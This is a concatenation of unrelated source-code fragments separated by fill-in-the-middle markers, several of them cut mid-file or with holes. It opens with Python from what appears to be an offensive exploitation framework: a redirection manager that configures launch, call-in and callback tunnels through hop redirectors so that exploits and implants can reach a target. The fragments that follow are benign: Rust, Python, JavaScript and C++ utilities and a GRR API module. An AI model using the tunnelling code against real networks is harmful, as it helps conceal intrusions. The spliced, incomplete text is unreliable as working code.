RAND_PORT_MIN = 1025
RAND_PORT_MAX = 65535
return str(random.randint(RAND_PORT_MIN, RAND_PORT_MAX))
class LocalRedirection(object):
"""
listenaddr: Name of parameter to give the IP addr of listening tunnel on local LP
listenport: Name of parameter to give the port of the listening tunnel on local LP
destaddr: Name of parameter that contains the IP of the target computer
destport: Name of parameter that contains the port on the target computer
"""
def __init__(self, protocol, listenaddr, listenport, destaddr, destport,
closeoncompletion="false", name="", srcport=None, srcportlist=None,
srcportrange=None, *trashargs, **trashkargs):
self.protocol = protocol
# XXX - The redirection section really shouldn't have XPath in it.
self.listenaddr = strip_xpath(listenaddr)
self.listenport = strip_xpath(listenport)
self.destaddr = strip_xpath(destaddr)
self.destport = strip_xpath(destport)
self.closeoncompletion = str2bool(closeoncompletion)
self.name = name
self.srcport = strip_xpath(srcport)
self.srcportlist = srcportlist
self.srcportrange = srcportrange
def __repr__(self):
return str(self.__dict__)
class RemoteRedirection(object):
def __init__(self, protocol, listenaddr, destport, closeoncompletion="false",
name="", listenport=None, listenportlist=None,
listenportrange=None, listenportcount=None, destaddr="0.0.0.0",
*trashargs, **trashkargs):
self.protocol = protocol
self.listenaddr = strip_xpath(listenaddr)
self.listenport = strip_xpath(listenport)
self.destaddr = strip_xpath(destaddr)
self.destport = strip_xpath(destport)
self.closeoncompletion = str2bool(closeoncompletion)
self.name = name
# Need conversion?
self.listenportlist = listenportlist
self.listenportrange = listenportrange
self.listenportcount = listenportcount
def __repr__(self):
return str(self.__dict__)
class RedirectionManager:
"""This is something of a misnomer. This is really a redirection manager rather than
a redirection object. This is responsible for taking the defined tunnels in the
plug-in's XML and 'swapping out' the parameters as they pertain to redirection.
A sample redirection section appears as follows:
<redirection>
<!-- (1) The "throwing" tunnel -->
<local name="Launch"
protocol="TCP"
listenaddr="TargetIp" # IP of redirector
listenport="TargetPort" # Port of redirector
destaddr="TargetIp" # IP of target computer
destport="TargetPort" # Port of target computer
closeoncompletion="true"/>
<!-- (2) The "Callin" tunnel -->
<local name="Callin"
protocol="TCP"
listenaddr="TargetIp" # IP on redirector
listenport="CallinPort" # Port on redirector
destaddr="TargetIp" # IP of target callin
destport="ListenPort" # Port of target callin
closeoncompletion="false"/>
<!-- (3) The "callback" tunnel -->
<remote name="Callback"
protocol="TCP"
listenaddr="CallbackIp" # IP opened by egg (last redirector)
listenport="CallbackPort" # Port opened by egg (last redirector)
destport="CallbackLocalPort" # Port for throwing side to listen
closeoncompletion="false"/>
</redirection>
For the "throwing" (launch) tunnel, we:
1: Ask for/retrieve the "Destination IP" and "Destination Port", which default to
the "TargetIp" and "TargetPort" parameters
2: Ask for the "Listen IP" (listenaddr) and "Listen Port" (listenport)
and then swap them in "TargetIp" and "TargetPort"
3: After execution, restore the proper session parameters
* (listenaddr, listenport) = l(destaddr, destport)
For the "callin" tunnel, we:
1: Ask for/retrieve the "Destination IP" and Destination Port", which default to
the "TargetIp" and the "ListenPort" parameters
2: Ask for the "Listen IP" (listenaddr) and "Listen Port" (listenport) and
then swap them into "TargetIp" and "CallinPort" parameters
3: After execution, restore the proper session parameters
* (listenaddr, listenport) = l(destaddr, destport)
For the "callback" tunnel, we:
1: Ask for the Listen IP and Listen Port for which the payload will callback.
This is most likely the last hop redirector IP and a port on it
2: Ask for the Destination IP and Destination Port, which will likely be the
operator workstation. Store the Destination port as "CallbackLocalPort",
basically ignoring the DestinationIp
3: After execution, restore the proper session parameters
* (destaddr, destport) = l(listenaddr, listenport)
"""
def __init__(self, io):
self.io = io
self.active = False
# A place to store parameters for the session. We push the info, run the plug-in
# (with redirection), and then pop the info to restore it
self.session_cache = {}
def on(self):
self.active = True
def off(self):
self.active = False
def is_active(self):
return self.active
def get_status(self):
if self.active:
return "ON"
else:
return "OFF"
def get_session(self, id):
return self.session_cache.get(id)
def pre_exec(self, plugin):
if not plugin.canRedirect():
return 0
if self.is_active():
self.io.print_msg("Redirection ON")
return self.config_redirect(plugin, True)
else:
self.io.print_msg("Redirection OFF")
return self.config_redirect(plugin, False)
def post_exec(self, plugin, id):
if id == 0:
return
# if plugin doesn't do redir, return
try:
stored_session_data = self.session_cache.pop(id)
except KeyError:
return
# Restore the old information to the session
for key,val in stored_session_data['params'].items():
plugin.set(key, val)
def print_session(self, id):
try:
session = self.session_cache[id]
except KeyError:
return
self.io.print_global_redir(session)
"""
Pre plugin execution
"""
def conv_param(self, val, params, session_data={}):
"""Resolve a value from one of session, params, or the hard value"""
try:
# First try to find the session parameter
if val in session_data:
return session_data[val]
# Then try to find the context-specific parameter
if is_identifier(val):
return params[val]
except:
return None
# If it is neither a session or context parameter, return the value as is
return val
def prompt_redir_fake(self, msg, default):
done = None
while not done:
try:
line = self.io.prompt_user(msg, default)
except exception.PromptHelp, err:
self.io.print_warning('No help available')
except exception.PromptErr, err:
raise
except exception.CmdErr, err:
self.io.print_error(err.getErr())
if line:
return line
def prompt_redir(self, plugin, var, msg, default):
"""Prompt for a redirect value and set it in Truantchild"""
done = None
while not done:
try:
line = self.io.prompt_user(msg, default)
plugin.set(var, line)
done = plugin.hasValidValue(var)
except exception.PromptHelp, err:
self.io.print_warning('No help available')
except exception.PromptErr, err:
raise
except exception.CmdErr, err:
self.io.print_error(err.getErr())
return plugin.get(var)
def straight_remote(self, r, plugin):
params = iDict(plugin.getParameters())
lport = self.conv_param(r.listenport, params)
dport = self.conv_param(r.destport, params)
laddr = self.conv_param(r.listenaddr, params)
if None in (lport, dport, laddr):
return
# Do we need to choose a random local port?
# XXX - This won't happen unless lport is 0
if not lport or lport == "0":
lport = rand_port()
# Store off the old values so that we can restore them after the
# plug-in executes
cache = {r.listenaddr : plugin.get(r.listenaddr),
r.listenport : plugin.get(r.listenport),
r.destport : plugin.get(r.destport)}
self.io.print_success("Remote Tunnel - %s" % r.name)
try:
# Modify the plugin and report success
callbackip = self.prompt_redir(plugin, r.listenaddr, 'Listen IP', laddr)
callbackport = self.prompt_redir(plugin, r.listenport, 'Listen Port', lport)
plugin.set(r.destport, callbackport)
self.io.print_success("(%s) Remote %s:%s" % (r.protocol, callbackip, callbackport))
except exception.PromptErr:
self.io.print_error("Aborted by user")
for (var,val) in cache.items():
try:
plugin.set(var, val)
except:
self.io.print_error("Error setting '%s' - May be in an inconsistent state" % var)
raise
def straight_local(self, l, plugin):
"""Effectively just print the straight path to the target"""
params = iDict(plugin.getParameters())
laddr = self.conv_param(l.listenaddr, params)
lport = self.conv_param(l.listenport, params)
if not laddr or not lport:
return
# HACK HACK
# The logic here was previously wrong, which meant that people didn't have to be careful
# about their redirection sections. Until we get them fixed, we need a hack that will
# allow these invalid redirection sections if we try it the valid way and fail
enable_hack = False
try:
cache = {l.destaddr : plugin.get(l.destaddr),
l.destport : plugin.get(l.destport)}
laddr = self.conv_param(l.destaddr, params)
lport = self.conv_param(l.destport, params)
except exception.CmdErr:
enable_hack = True
cache = {l.destaddr : plugin.get(l.listenaddr),
l.destport : plugin.get(l.listenport)}
self.io.print_success("Local Tunnel - %s" % l.name)
try:
if not enable_hack:
targetip = self.prompt_redir(plugin, l.destaddr, 'Destination IP', laddr)
targetport = self.prompt_redir(plugin, l.destport, 'Destination Port', lport)
self.io.print_success("(%s) Local %s:%s" % (l.protocol, targetip, targetport))
else:
targetip = self.prompt_redir(plugin, l.listenaddr, 'Destination IP', laddr)
targetport = self.prompt_redir(plugin, l.listenport, 'Destination Port', lport)
self.io.print_success("(%s) Local %s:%s" % (l.protocol, targetip, targetport))
except exception.PromptErr:
self.io.print_error("Aborted by user")
for (var,val) in cache.items():
try:
plugin.set(var, val)
except:
self.io.print_error("Error setting '%s' - May be in an inconsistent state" % var)
raise
except Exception as e:
self.io.print_error("Error: {0}".format(str(type(e))))
def redirect_remote(self, r, plugin, session_data):
"""(destaddr, destport) = r-xform(listenaddr, listenport)
* Each of the identifiers above specifies a variable for the plug-in
(1) Prompt for Listen IP - Likely the ultimate redirector's IP
(2) Prompt for Listen Port - Likely the ultimate redirector's port
(3) Prompt for Destination - Likely 0.0.0.0
(4) Prompt for Destination Port - Likely a local port
Lookup the variables specified by listenaddr and listenport, transform them with
a given transform function, and substitute the resulting values into the
variables specified by destaddr and destport.
The plug-in will then have to open a port to listen on using the variables
specified by the destnation IP and destination port
"""
params = iDict(plugin.getParameters())
lport = self.conv_param(r.listenport, params, session_data['params'])
dport = self.conv_param(r.destport, params, session_data['params'])
laddr = self.conv_param(r.listenaddr, params, session_data['params'])
daddr = self.conv_param(r.destaddr, params, session_data['params'])
if None in (lport, dport, laddr, daddr):
for p,n in (laddr, r.listenaddr), (lport, r.listenport), (daddr, r.destaddr), (dport, r.destport):
if p == None:
self.io.print_warning("Parameter %s referenced by tunnel %s not found. This tunnel will "
"be ignored" % (n, r.name))
return
if not lport or lport == "0":
lport = rand_port()
self.io.print_success("Remote Tunnel - %s" % r.name)
#
# Prompt the user for the listenaddr and listenport
#
callbackip = self.prompt_redir(plugin, r.listenaddr, 'Listen IP', laddr)
callbackport = self.prompt_redir(plugin, r.listenport, 'Listen Port', lport)
#
# Do the substitution
#
session_data['params'][r.listenaddr] = callbackip
session_data['params'][r.listenport] = callbackport
# Get the other end of the tunnel, where the connection will eventually be made.
# This will likely be, but does not have to be, the local workstation
callbacklocalip = self.prompt_redir_fake('Destination IP', daddr)
if not dport:
dport = callbackport
callbacklocalport = self.prompt_redir(plugin, r.destport, 'Destination Port', dport)
session_data['params'][r.destport] = callbacklocalport
session_data['remote'].append(RemoteRedirection(r.protocol,
callbackip,
callbacklocalport,
listenport=callbackport,
destaddr=callbacklocalip,
name=r.name))
self.io.print_success("(%s) Remote %s:%s -> %s:%s" %
(r.protocol, callbackip, callbackport,
callbacklocalip, callbacklocalport))
def redirect_local(self, l, plugin, session_data):
"""
targetip = Destination IP (on the target)
targetport = Destination Port (on the target)
redirip = IP of the LP
redirport = Port on the LP
"""
# listenaddr - name of variable containing the LP IP
# listenport - name of variable containing the LP Port
# destaddr - name of variable containing the Target IP
# destport - name of variable containing the Target Port
# targetip - IP of the target
# targetport - Port of the target
# redirip - IP of the LP
# redirport - Port of the LP
params = iDict(plugin.getParameters())
# Get the defaults for the user prompt
laddr = self.conv_param(l.listenaddr, params, session_data['params'])
lport = self.conv_param(l.listenport, params, session_data['params'])
daddr = self.conv_param(l.destaddr, params, session_data['params'])
dport = self.conv_param(l.destport, params, session_data['params'])
if None in (laddr, lport, daddr, dport):
for p,n in (laddr, l.listenaddr), (lport, l.listenport), (daddr, l.destaddr), (dport, l.destport):
if p == None:
self.io.print_warning("Parameter %s referenced by tunnel %s not found. This tunnel will "
"be ignored" % (n, l.name))
return
self.io.print_success("Local Tunnel - %s" % l.name)
#
# Get the destination IP and port for the target
#
targetip = self.prompt_redir_fake('Destination IP', daddr)
targetport = self.prompt_redir_fake('Destination Port', dport)
#
# Get the redirection addresses
#
redirip = self.prompt_redir(plugin, l.listenaddr, 'Listen IP', '127.0.0.1')
if not dport:
dport = targetport
redirport = self.prompt_redir(plugin, l.listenport, 'Listen Port', lport)
#
#
#
session_data['params'][l.listenaddr] = targetip
session_data['params'][l.listenport] = targetport
#
# Record the redirection tunnel
#
session_data['local'].append(LocalRedirection(l.protocol, redirip,
redirport, targetip,
targetport, name=l.name))
self.io.print_success("(%s) Local %s:%s -> %s:%s" %
(l.protocol, redirip, redirport, targetip, targetport))
def config_redirect(self, plugin, do_redir):
"""Configure whether the plug-in should perform redirection
plugin - An instance of a plugin
do_redir - Should we do redirection? (True or False)"""
redir = plugin.getRedirection()
# Make a new session dictionary here
session_data = {
'params' : {}, #
'remote' : [], #
'local' : [] #
}
if do_redir:
id = uuid.uuid4()
else:
id = 0
try:
self.io.newline()
self.io.print_success("Configure Plugin Local Tunnels")
for l in redir['local']:
if do_redir:
self.redirect_local(l, plugin, session_data)
else:
self.straight_local(l, plugin)
self.io.newline()
self.io.print_success("Configure Plugin Remote Tunnels")
for r in redir['remote']:
if do_redir:
self.redirect_remote(r, plugin, session_data)
else:
self.straight_remote(r, plugin)
except exception.PromptErr:
for key,val in session_data['params'].items():
plugin.set(key, val)
raise
self.io.newline()
# Store info into the cache so that we can restore it in post_exec
if id:
self.session_cache[id] = session_data
return id<|fim▁end|>
| |
<|file_name|>rule.rs<|end_file_name|><|fim▁begin|>use crate::model::path::Path;
use crate::model::path_pattern::PathPattern;
/// A rule line is a single "Allow:" (allowance==True) or "Disallow:"
/// (allowance==False) followed by a path."""
#[derive(Debug, Clone)]
pub struct Rule {
path_pattern: PathPattern,
allowance: bool,
}
impl Rule {
pub fn new(path_pattern: impl Into<PathPattern>, allowance: bool) -> Rule {
Rule {
path_pattern: path_pattern.into(),
allowance,
}
}
pub(crate) fn applies_to(&self, path: &Path) -> bool {
self.path_pattern.applies_to(path)
}
pub(crate) fn get_allowance(&self) -> bool {
self.allowance
}
pub(crate) fn get_path_pattern(&self) -> &PathPattern {
&self.path_pattern<|fim▁hole|><|fim▁end|>
|
}
}
|
<|file_name|>parseTest.py<|end_file_name|><|fim▁begin|>#!/usr/bin/python
import re
userInput = raw_input("input equation\n")
numCount = 0
operandCount = 0
entryBracketCount = 0
exitBracketCount = 0
charCount = 0
endOfLine = len(userInput) - 1
for i in range(len(userInput)):
if (re.search('[\s*a-z\s*A-Z]+', userInput[i])):
charCount = charCount + 1
print operandCount, " 1"
elif (re.search('[\s*0-9]+', userInput[i])):
numCount = numCount + 1
print operandCount, " 2"
elif (re.search('[\*]', userInput[i])):
print 'TRUE'
# operandCount = operandCount + 1
# print operandCount, " 3.5"
# elif (re.search('[\s*\+|\s*\-|\s*\/]+', userInput[i])):
elif (re.search('[+-/*]+', userInput[i])):
operandCount = operandCount + 1
print operandCount, " 3"
# if(re.search('[\s*\+|\s*\-|\s*\/]+', userInput[endOfLine])):
if(re.search('[+-/*]+', userInput[endOfLine])):
print "invalid expression"
print "1"
exit(0)
else:
if((re.search('[\s*a-zA-Z]+', userInput[i - 1])) or (re.search('[\s*\d]+', userInput[i - 1]))):
continue
else:
print 'invalid expression'
print '2'
exit(0)
if(re.search('[\s*\d]+', userInput[i - 1])):
continue
else:
print 'invalid expression'
print '3'
exit(0)<|fim▁hole|> continue
elif (re.search('[\(]+', userInput[i + 1])):
continue
elif (re.search('[\)]+', userInput[i + 1])):
continue
else:
print 'invalid expression'
print '4'
exit(0)
elif (re.search('[\(]+', userInput[i])):
entryBracketCount = entryBracketCount + 1
print operandCount, " 4"
elif (re.search('[\)]+', userInput[i])):
exitBracketCount = exitBracketCount + 1
print operandCount, " 5"
if(re.search('[\)]+', userInput[endOfLine])):
continue
else:
if(re.search('[\(]+', userInput[i + 1])):
print 'invalid expression'
print '5'
exit(0)
print operandCount, " 6"
if (entryBracketCount != exitBracketCount):
print "invalid expression"
print '6'
exit(0)
elif operandCount == 0:
print operandCount
print "invalid expression"
print '7'
exit(0)
elif ((numCount == 0) and (charCount == 0)):
print "invalid expression"
print '8'
exit(0)
else:
print "valid expression"<|fim▁end|>
|
if(re.search('[\s*a-zA-Z]+', userInput[i + 1])):
continue
elif(re.search('[\s*\d]+', userInput[i + 1])):
|
<|file_name|>cninetyninehexfloatf.rs<|end_file_name|><|fim▁begin|>//! formatter for %a %F C99 Hex-floating-point subs
use super::super::format_field::FormatField;
use super::super::formatter::{InPrefix, FormatPrimitive, Formatter};
use super::float_common::{FloatAnalysis, primitive_to_str_common};
use super::base_conv;
use super::base_conv::RadixDef;
pub struct CninetyNineHexFloatf {
as_num: f64,
}
impl CninetyNineHexFloatf {
pub fn new() -> CninetyNineHexFloatf {
CninetyNineHexFloatf { as_num: 0.0 }
}
}
impl Formatter for CninetyNineHexFloatf {
fn get_primitive(&self,
field: &FormatField,
inprefix: &InPrefix,
str_in: &str)
-> Option<FormatPrimitive> {
let second_field = field.second_field.unwrap_or(6) + 1;
let analysis = FloatAnalysis::analyze(&str_in,
inprefix,
Some(second_field as usize),
None,
true);
let f = get_primitive_hex(inprefix,
&str_in[inprefix.offset..],
&analysis,
second_field as usize,
*field.field_char == 'A');
Some(f)
}
fn primitive_to_str(&self, prim: &FormatPrimitive, field: FormatField) -> String {<|fim▁hole|>}
// c99 hex has unique requirements of all floating point subs in pretty much every part of building a primitive, from prefix and suffix to need for base conversion (in all other cases if you don't have decimal you must have decimal, here it's the other way around)
// on the todo list is to have a trait for get_primitive that is implemented by each float formatter and can override a default. when that happens we can take the parts of get_primitive_dec specific to dec and spin them out to their own functions that can be overriden.
#[allow(unused_variables)]
#[allow(unused_assignments)]
fn get_primitive_hex(inprefix: &InPrefix,
str_in: &str,
analysis: &FloatAnalysis,
last_dec_place: usize,
capitalized: bool)
-> FormatPrimitive {
let mut f: FormatPrimitive = Default::default();
f.prefix = Some(String::from(if inprefix.sign == -1 {
"-0x"
} else {
"0x"
}));
// assign the digits before and after the decimal points
// to separate slices. If no digits after decimal point,
// assign 0
let (mut first_segment_raw, second_segment_raw) = match analysis.decimal_pos {
Some(pos) => (&str_in[..pos], &str_in[pos + 1..]),
None => (&str_in[..], "0"),
};
if first_segment_raw.len() == 0 {
first_segment_raw = "0";
}
// convert to string, hexifying if input is in dec.
// let (first_segment, second_segment) =
// match inprefix.radix_in {
// Base::Ten => {
// (to_hex(first_segment_raw, true),
// to_hex(second_segment_raw, false))
// }
// _ => {
// (String::from(first_segment_raw),
// String::from(second_segment_raw))
// }
// };
//
//
// f.pre_decimal = Some(first_segment);
// f.post_decimal = Some(second_segment);
//
// TODO actual conversion, make sure to get back mantissa.
// for hex to hex, it's really just a matter of moving the
// decimal point and calculating the mantissa by its initial
// position and its moves, with every position counting for
// the addition or subtraction of 4 (2**4, because 4 bits in a hex digit)
// to the exponent.
// decimal's going to be a little more complicated. correct simulation
// of glibc will require after-decimal division to a specified precisino.
// the difficult part of this (arrnum_int_div_step) is already implemented.
// the hex float name may be a bit misleading in terms of how to go about the
// conversion. The best way to do it is to just convert the floatnum
// directly to base 2 and then at the end translate back to hex.
let mantissa = 0;
f.suffix = Some({
let ind = if capitalized {
"P"
} else {
"p"
};
if mantissa >= 0 {
format!("{}+{}", ind, mantissa)
} else {
format!("{}{}", ind, mantissa)
}
});
f
}
fn to_hex(src: &str, before_decimal: bool) -> String {
let rten = base_conv::RadixTen;
let rhex = base_conv::RadixHex;
if before_decimal {
base_conv::base_conv_str(src, &rten, &rhex)
} else {
let as_arrnum_ten = base_conv::str_to_arrnum(src, &rten);
let s = format!("{}",
base_conv::base_conv_float(&as_arrnum_ten, rten.get_max(), rhex.get_max()));
if s.len() > 2 {
String::from(&s[2..])
} else {
// zero
s
}
}
}<|fim▁end|>
|
primitive_to_str_common(prim, &field)
}
|
<|file_name|>regions-variance-covariant-use-covariant.rs<|end_file_name|><|fim▁begin|>// Copyright 2012 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
// Test that a type which is covariant with respect to its region
// parameter is successful when used in a covariant way.
//<|fim▁hole|>// check that the variance inference works in the first place.
// This is covariant with respect to 'a, meaning that
// Covariant<'foo> <: Covariant<'static> because
// 'foo <= 'static
// pretty-expanded FIXME #23616
struct Covariant<'a> {
f: extern "Rust" fn(&'a isize)
}
fn use_<'a>(c: Covariant<'a>) {
// OK Because Covariant<'a> <: Covariant<'static> iff 'a <= 'static
let _: Covariant<'static> = c;
}
pub fn main() {}<|fim▁end|>
|
// Note: see compile-fail/variance-regions-*.rs for the tests that
|
<|file_name|>osis_datatable.js<|end_file_name|><|fim▁begin|>function initializeDataTable(formId, tableId, storageKey, pageNumber, itemsPerPage, ajaxUrl, columnDefs, extra){
let domTable = $('#' + tableId);
let options = {
'createdRow': function (row, data, dataIndex) {
let url = "";
if (data['osis_url']) {
url = data['osis_url'];
} else {
url = data['url'];
}
$(row).attr('data-id', url);
$(row).attr('data-value', data['acronym']);
},
columnDefs: columnDefs,
"stateSave": true,
"paging" : false,
"ordering" : true,
"orderMulti": false,
"order": [[1, 'asc']],
"serverSide": true,
"ajax" : {
"url": ajaxUrl,
"accepts": {
json: 'application/json'
},
"type": "GET",
"dataSrc": "object_list",
"data": function (d){
let querystring = getDataAjaxTable(formId, domTable, d, pageNumber);
querystring["paginator_size"] = itemsPerPage;
return querystring;
},
"traditional": true
},<|fim▁hole|> "oAria": {
"sSortAscending": gettext("activate to sort column ascending"),
"sSortDescending": gettext("activate to sort column descending")
}
}
};
return domTable.DataTable($.extend(true, {}, options, extra));
}
function outputAnchorOuterHtml(urlPath, textContent){
const anchor = document.createElement("a");
anchor.setAttribute("href", urlPath);
anchor.textContent = textContent;
return anchor.outerHTML;
}<|fim▁end|>
|
"info" : false,
"searching" : false,
'processing': false,
"language": {
|
<|file_name|>Student.cpp<|end_file_name|><|fim▁begin|>//
// Student.cpp
// HorairesExams
//
// Created by Quentin Peter on 19.11.13.
// Copyright (c) 2013 Quentin. All rights reserved.
//
#include "Student.h"
#include "Examen.h"
Student::Student(string name, string email, int sciper): a_name(name),a_email(email),a_sciper(sciper){}
string Student::name() const{
return a_name;
}<|fim▁hole|>string Student::eMail(){
return a_email;
}
int Student::sciper(){
return a_sciper;
}
bool Student::addExam(Date date,Time time, Examen* ptrExa){
return a_timeTable.addOnDateAndTime(ptrExa, date, time);
}
void Student::addExam(Date date, Examen* ptr){
a_timeTable.addOnDate(ptr, date);
}
bool Student::fixeExam(Date date,Time time, Examen* ptrExa, int minDist){
return a_timeTable.addOnDateFarFrom(ptrExa, date, time , minDist);
}
vector<int> Student::nbrExamenDate(vector<Date> listDate){
vector<int> retour;
for (int i(0); i<listDate.size(); i++) {
retour.push_back(a_timeTable.numberObjectsOnDate(listDate[i]));
}
return retour;
}
int Student::calculerScore(){
//On calcule la distance entre les dates. si une date a plusieurs objets on récupère les crénaux horaires et on les note
int score(0);
Date precedant(a_timeTable.begin()->first);//La date est la première
for (auto it(a_timeTable.begin()); it!= a_timeTable.end(); it++) {
//On calcule le nombre de jours depuis le precedant
int distanceJours(Date::distance(precedant, it->first));
if (distanceJours<3) {//Si il y a plus de trois jours le score deviens stable
score+=distanceJours;
}
else{
score+=3;
}
precedant=it->first;
//Maintenant on vérifie qu'il n'y aie pas trop d'exas le même jour
int nombreExamen(it->second->nombreElement());
if (nombreExamen>2) {
score-=10000;//On tue le score si il y a plus de deux exas, Ca ne devrait pas arriver
}
else if (nombreExamen==2){
score-=1000;
//Si on a deux exas, il nous faut les heures
vector<Time> heures(it->second->getTime());
if (heures.size()==2) {
int distanceHeure (Time::distance(heures[0], heures[1]));
//Si la distance est moins que deux heures, l'étudiant ne pourra pas aller a son autre exa
if (distanceHeure<2*60) {
score-=10000;
}
else if (distanceHeure<4*60){
//Si on a moins de 4 heures on perd 10 points
score-=10;
}
else if (distanceHeure<6*60){
score -=8;
}
else{
score-=5;
}
}
else{
cout << "Le score est calculé pour des exas non fixés" <<endl;
}
}
}
return score;
}
Student* Student::newStudent(){
return new Student(a_name,a_email,a_sciper);
}
void Student::afficher(ofstream& fSave){
fSave<<a_name<<endl;
fSave<<a_email<<endl<<endl;
for (auto it(a_timeTable.begin()); it!=a_timeTable.end(); it++) {
fSave<<endl<<"\t "<<it->first<<endl<<endl;
fSave<<*(it->second);//Pas de endl car déjà a la fin de chaque nom
}
}<|fim▁end|>
| |
<|file_name|>http_api.py<|end_file_name|><|fim▁begin|>#!/usr/bin/env python
"""HTTP API logic that ties API call renderers with HTTP routes."""
import json
from django import http
from werkzeug import exceptions as werkzeug_exceptions
from werkzeug import routing
import logging
from grr.gui import api_call_renderers
from grr.lib import access_control
from grr.lib import rdfvalue
from grr.lib import registry
def BuildToken(request, execution_time):
"""Build an ACLToken from the request."""
if request.method == "GET":
reason = request.GET.get("reason", "")
elif request.method == "POST":
reason = request.POST.get("reason", "")
token = access_control.ACLToken(
username=request.user,
reason=reason,
process="GRRAdminUI",
expiry=rdfvalue.RDFDatetime().Now() + execution_time)
for field in ["REMOTE_ADDR", "HTTP_X_FORWARDED_FOR"]:
remote_addr = request.META.get(field, "")
if remote_addr:
token.source_ips.append(remote_addr)
return token
HTTP_ROUTING_MAP = routing.Map()
def RegisterHttpRouteHandler(method, route, renderer_cls):
"""Registers given ApiCallRenderer for given method and route."""
HTTP_ROUTING_MAP.add(routing.Rule(
route, methods=[method],
endpoint=renderer_cls))
def GetRendererForHttpRequest(request):
"""Returns a renderer to handle given HTTP request."""
matcher = HTTP_ROUTING_MAP.bind("%s:%s" % (request.environ["SERVER_NAME"],
request.environ["SERVER_PORT"]))
try:
match = matcher.match(request.path, request.method)
except werkzeug_exceptions.NotFound:
raise api_call_renderers.ApiCallRendererNotFoundError(
"No API renderer was found for (%s) %s" % (request.path,
request.method))
renderer_cls, route_args = match
return (renderer_cls(), route_args)
def FillAdditionalArgsFromRequest(request, supported_types):
"""Creates arguments objects from a given request dictionary."""
results = {}
for key, value in request.items():
try:
request_arg_type, request_attr = key.split(".", 1)
except ValueError:
continue
arg_class = None
for key, supported_type in supported_types.items():
if key == request_arg_type:
arg_class = supported_type
if arg_class:
if request_arg_type not in results:
results[request_arg_type] = arg_class()
results[request_arg_type].Set(request_attr, value)
results_list = []
for name, arg_obj in results.items():
additional_args = rdfvalue.ApiCallAdditionalArgs(
name=name, type=supported_types[name].__name__)
additional_args.args = arg_obj
results_list.append(additional_args)
return results_list
class JSONEncoderWithRDFPrimitivesSupport(json.JSONEncoder):
"""Custom JSON encoder that encodes renderers output.
Custom encoder is required to facilitate usage of primitive values -
booleans, integers and strings - in renderers responses.
If renderer references an RDFString, RDFInteger or and RDFBOol when building a
response, it will lead to JSON encoding failure when response encoded,
unless this custom encoder is used. Another way to solve this issue would be
to explicitly call api_value_renderers.RenderValue on every value returned
from the renderer, but it will make the code look overly verbose and dirty.
"""
def default(self, obj):
if isinstance(obj, (rdfvalue.RDFInteger,
rdfvalue.RDFBool,
rdfvalue.RDFString)):
return obj.SerializeToDataStore()
return json.JSONEncoder.default(self, obj)
def BuildResponse(status, rendered_data):
"""Builds HTTPResponse object from rendered data and HTTP status."""<|fim▁hole|> cls=JSONEncoderWithRDFPrimitivesSupport))
return response
def RenderHttpResponse(request):
"""Handles given HTTP request with one of the available API renderers."""
renderer, route_args = GetRendererForHttpRequest(request)
if request.method == "GET":
if renderer.args_type:
unprocessed_request = request.GET
if hasattr(unprocessed_request, "dict"):
unprocessed_request = unprocessed_request.dict()
args = renderer.args_type()
for type_info in args.type_infos:
if type_info.name in route_args:
args.Set(type_info.name, route_args[type_info.name])
elif type_info.name in unprocessed_request:
args.Set(type_info.name, unprocessed_request[type_info.name])
if renderer.additional_args_types:
if not hasattr(args, "additional_args"):
raise RuntimeError("Renderer %s defines additional arguments types "
"but its arguments object does not have "
"'additional_args' field." % renderer)
if hasattr(renderer.additional_args_types, "__call__"):
additional_args_types = renderer.additional_args_types()
else:
additional_args_types = renderer.additional_args_types
args.additional_args = FillAdditionalArgsFromRequest(
unprocessed_request, additional_args_types)
else:
args = None
elif request.method == "POST":
try:
payload = json.loads(request.body)
args = renderer.args_type(**payload)
except Exception as e: # pylint: disable=broad-except
response = http.HttpResponse(status=500)
response.write(")]}'\n") # XSSI protection
response.write(json.dumps(dict(message=str(e))))
logging.exception(
"Error while parsing POST request %s (%s): %s",
request.path, request.method, e)
return response
else:
raise RuntimeError("Unsupported method: %s." % request.method)
token = BuildToken(request, renderer.max_execution_time)
try:
rendered_data = api_call_renderers.HandleApiCall(renderer, args,
token=token)
return BuildResponse(200, rendered_data)
except Exception as e: # pylint: disable=broad-except
logging.exception(
"Error while processing %s (%s) with %s: %s", request.path,
request.method, renderer.__class__.__name__, e)
return BuildResponse(500, dict(message=str(e)))
class HttpApiInitHook(registry.InitHook):
"""Register HTTP API renderers."""
def RunOnce(self):
# Doing late import to avoid circular dependency (http_api.py is referenced
# by api_plugins/docs.py).
#
# pylint: disable=g-import-not-at-top
from grr.gui import api_plugins
# pylint: enable=g-import-not-at-top
# The list is alphabetized by route.
RegisterHttpRouteHandler("GET", "/api/aff4/<path:aff4_path>",
api_plugins.aff4.ApiAff4Renderer)
RegisterHttpRouteHandler("GET", "/api/aff4-index/<path:aff4_path>",
api_plugins.aff4.ApiAff4IndexRenderer)
RegisterHttpRouteHandler("GET", "/api/artifacts",
api_plugins.artifact.ApiArtifactRenderer)
RegisterHttpRouteHandler("GET", "/api/clients",
api_plugins.client.ApiClientSearchRenderer)
RegisterHttpRouteHandler("GET", "/api/clients/<client_id>",
api_plugins.client.ApiClientSummaryRenderer)
RegisterHttpRouteHandler("GET", "/api/clients/labels",
api_plugins.client.ApiClientsLabelsListRenderer)
RegisterHttpRouteHandler("POST", "/api/clients/labels/add",
api_plugins.client.ApiClientsAddLabelsRenderer)
RegisterHttpRouteHandler("POST", "/api/clients/labels/remove",
api_plugins.client.ApiClientsRemoveLabelsRenderer)
RegisterHttpRouteHandler("GET", "/api/config",
api_plugins.config.ApiConfigRenderer)
RegisterHttpRouteHandler("GET", "/api/docs",
api_plugins.docs.ApiDocsRenderer)
RegisterHttpRouteHandler("GET", "/api/flows/<client_id>/<flow_id>/status",
api_plugins.client.ApiFlowStatusRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts",
api_plugins.hunt.ApiHuntsListRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts/<hunt_id>",
api_plugins.hunt.ApiHuntSummaryRenderer)
RegisterHttpRouteHandler("GET", "/api/hunts/<hunt_id>/errors",
api_plugins.hunt.ApiHuntErrorsRenderer)
